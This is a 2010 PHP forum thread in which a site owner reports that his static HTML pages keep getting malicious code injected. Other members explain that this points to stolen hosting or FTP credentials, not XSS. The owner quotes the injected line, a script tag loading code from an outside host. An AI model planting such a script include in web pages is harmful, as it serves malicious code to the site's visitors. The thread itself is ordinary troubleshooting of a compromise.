joshbb Posted June 17, 2010 Share Posted June 17, 2010 Hi, I have my website in asp 2.0 which is CMS build from local vendor. It was vulnerable to XSS and facing XSS from last 2 months. Now I decided to put static HTML website with no inputs from client. Can some one provide guidlines. Quote Link to comment Share on other sites More sharing options...
Soldier Jane Posted June 17, 2010 Share Posted June 17, 2010 Guidelines for what exactly? Also, this is a PHP forum not ASP, you may want to try posting elsewhere, perhaps even the HTML one. Or are you asking how to generate static HTML pages using PHP? Oh, and XSS is covered in a tutorial on this very site: http://www.phpfreaks.com/tutorial/php-security Quote Link to comment Share on other sites More sharing options...
joshbb Posted June 17, 2010 Author Share Posted June 17, 2010 Please see following page: Template <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <link href="style.css" rel="stylesheet" type="text/css" /> <link href="layout.css" rel="stylesheet" type="text/css" /> <script src="js/cufon-yui.js" type="text/javascript"></script> <script src="js/cufon-replace.js" type="text/javascript"></script> <script src="js/Futura_Md_BT_italic_400.font.js" type="text/javascript"></script> <script src="js/Futura_Md_BT_italic_700.font.js" type="text/javascript"></script> <!--[if lt IE 7]> <link href="ie_style.css" rel="stylesheet" type="text/css" /> <![endif]--> </head> <body id="page1"> <!-- header --> <div id="header"> <div class="row-1"> <div class="container"> <div class="logo"><a href="index.html"><img alt="" src="images/logo.jpg" /></a></div> <ul class="nav"> <li><a href="index.html" class="current">Home</a>|</li> <li><a href="index-1.html">Hosting</a>|</li> <li><a href="#">Domains</a>|</li> <li><a href="#">Web Design</a>|</li> <li><a href="#">Support</a>|</li> <li><a href="#">Solutions</a>|</li> <li><a href="#">Affiliates</a>|</li> <li><a href="#">Contacts</a></li> </ul> </div> </div> <div class="row-2"> <div class="bg"> <div class="container"> <div class="indent"> <img alt="" src="images/slogan.jpg" /> <div class="indent"> <p>Professional web hosting with easy website builder, unlimited traffic and a range of advanced <a href="#">web hosting</a> tools included.</p> <a href="#"><img alt="" src="images/button.gif" /></a> </div> </div> </div> </div> </div> </div> <!-- content --> <div id="content" class="extra-bg"> <div class="row-1"> <div class="container"> <ul class="banners"> <li> <h2 class="icon1">Domain name</h2> <h4>Registrations from $9.50</h4> <ul> <li><a href="#">NEW: domain privacy</a></li> <li><a href="#">Easy domain trasfers</a></li> <li><a href="#">Advanced DNS control</a></li> <li><a href="#">Personalised e-mail</a></li> </ul> <div class="wrapper"><a href="#">View details</a><a href="#" class="link1"><em><b>Signup Now!</b></em></a></div> </li> <li> <h2 class="icon2 alt">Dedicated <strong>servers</strong></h2> <h4>From $45.50 p/month</h4> <ul> <li><a href="#">50% OFF for 3 month</a></li> <li><a href="#">Unlimited bandwidth</a></li> <li><a href="#">Remote server control</a></li> <li><a href="#">Secure private network</a></li> </ul> <div class="wrapper"><a href="#">View details</a><a href="#" class="link1"><em><b>Signup Now!</b></em></a></div> </li> <li> <h2 class="icon3">Broadband</h2> <h4>From $34.50 p/month</h4> <ul> <li><a href="#">Unlimited downloads</a></li> <li><a href="#">No ties or restrictions</a></li> <li><a href="#">Static IP addresses</a></li> <li><a href="#">Low cotention ratios</a></li> </ul> <div class="wrapper"><a href="#">View details</a><a href="#" class="link1"><em><b>Signup Now!</b></em></a></div> </li> <li class="last"> <h2 class="icon4">Web hosting</h2> <h4>From only $3.59</h4> <ul> <li><a href="#">50% OFF for 3 month</a></li> <li><a href="#">Unlimited bandwidth</a></li> <li><a href="#">Windows & Linux</a></li> <li><a href="#">Easy website builder</a></li> </ul> <div class="wrapper"><a href="#">View details</a><a href="#" class="link1"><em><b>Signup Now!</b></em></a></div> </li> </ul> <ul class="top-proposals"> <li><a href="#"><img alt="" src="images/banner1.jpg" /></a></li> <li class="last"><a href="#"><img alt="" src="images/banner1.jpg" /></a></li> </ul> </div> </div> <div class="row-2"> <div class="container"> <div class="wrapper"> <div class="col-1"> <h3>Dedicated</h3> Lorem ipsum dolor sit amet, consectetuer adipi- scing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo <a href="#"><img alt="" src="images/arrow2.gif" /></a> </div> <div class="col-2"> <h3>New Customer</h3> Ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo <a href="#"><img alt="" src="images/arrow2.gif" /></a> </div> <div class="col-3"> <h3>Transfer Customer</h3> Lorem ipsum dolor sit amet, consectetuer adipi- scing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo <a href="#"><img alt="" src="images/arrow2.gif" /></a> </div> </div> </div> </div> </div> <!-- footer --> <div id="footer"> <div class="container"> wEb hOSTING © 2010 <a href="index-2.html">Privacy Policy</a> </div> </div> <script type="text/javascript"> Cufon.now(); </script> </body> </html> How can I protect above page from XSS, these are only static pages. having no input from client. Quote Link to comment Share on other sites More sharing options...
Mchl Posted June 17, 2010 Share Posted June 17, 2010 XSS attacks are only possible with dynamic pages. Static HTML can only be modified by someone acquiring access to your hosting account. Quote Link to comment Share on other sites More sharing options...
joshbb Posted June 17, 2010 Author Share Posted June 17, 2010 -- I am amazed how that guy inject code to my static HTML page. -- Maybe he/she is using his browser to insert malicious code into HTML page. -- Also problem is that google places label on your site. I used webmaster tools and removed that label. But XSS is most frequent about twice a day. -- His injected code is as under: <script src=http://tdisac.com.pe/images/_vti_inf.php ></script> this is very serious problem with my site. Need help. Quote Link to comment Share on other sites More sharing options...
Mchl Posted June 17, 2010 Share Posted June 17, 2010 XSS attacks are only possible with dynamic pages. Static HTML can only be modified by someone acquiring access to your hosting account. In other words: change your passwords, do not store passwords in your ftp program, check your PC for malware, check for vulnerabilities on other pages on this account. Quote Link to comment Share on other sites More sharing options...
haku Posted June 17, 2010 Share Posted June 17, 2010 If he is changing text on your static files, it sounds like he has access to your server and/or is running a script on your server that adds the script tag into files automatically. As mchl said, change your password. See if that stops it. If not you are going to have to clean out the files on your server. Quote Link to comment Share on other sites More sharing options...
joshbb Posted June 18, 2010 Author Share Posted June 18, 2010 -- I changed my ftp password but XSS occur frequently. -- Note that attacker does not change the text of my pages. Also its not automatic script because I traced out attacking patterns, some time site is free from XSS for 2 or 3 days at weekend. -- What I realized is that attacker used his browser for submitting malware code into my site. I want a page that does not accept any inputs from client end. It shows only what is on that page. Quote Link to comment Share on other sites More sharing options...
Mchl Posted June 18, 2010 Share Posted June 18, 2010 I want a page that does not accept any inputs from client end. It shows only what is on that page. The code you posted is exactly that. Quote Link to comment Share on other sites More sharing options...
joshbb Posted June 18, 2010 Author Share Posted June 18, 2010 -- I created simple HTML with message this site is down for maintenance. Attacker XSS that simple html page also. -- I found on many forums that static page can't be XSS attacked. but How that guy do that. -- I need quick solution please. Quote Link to comment Share on other sites More sharing options...
Mchl Posted June 18, 2010 Share Posted June 18, 2010 XSS attacks are only possible with dynamic pages. Static HTML can only be modified by someone acquiring access to your hosting account. In other words: change your passwords, do not store passwords in your ftp program, check your PC for malware, check for vulnerabilities on other pages on this account. Quote Link to comment Share on other sites More sharing options...
joshbb Posted June 22, 2010 Author Share Posted June 22, 2010 -- Mchl ! you mean I should change my hosting. -- Maybe this solve my problem, I was also intended to change hosting. -- Thanks for your feedback. Quote Link to comment Share on other sites More sharing options...
Mchl Posted June 22, 2010 Share Posted June 22, 2010 I did not mean that. What I meant is that you should check for any way someone else could get access to your account. Moving to another hosting will not help if you have spyware that steals your ftp passwords on your PC. Quote Link to comment Share on other sites More sharing options...
haku Posted June 22, 2010 Share Posted June 22, 2010 And it won't hope if you move the spyware from one server to the other. Quote Link to comment Share on other sites More sharing options...
joshbb Posted June 23, 2010 Author Share Posted June 23, 2010 -- I am using reseller hosting, and I dont have direct access to change my ftp -- I have to send request to owner of that software house to change ftp password. -- My account info is open to him also. -- Thats why I was thinking to change hosting. I have installed licensed Kaspersky 6.0.3 and Trojan remover. I dont think my pc have any types of trojans. Also note that XSS is very frequent means no have have much time to put XSS on about 50pages twice a day for so long time that is two months. Quote Link to comment Share on other sites More sharing options...
haku Posted June 23, 2010 Share Posted June 23, 2010 Well yes, in this case you should move your hosting. If you don't have access to your server, then there isn't much you can do. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.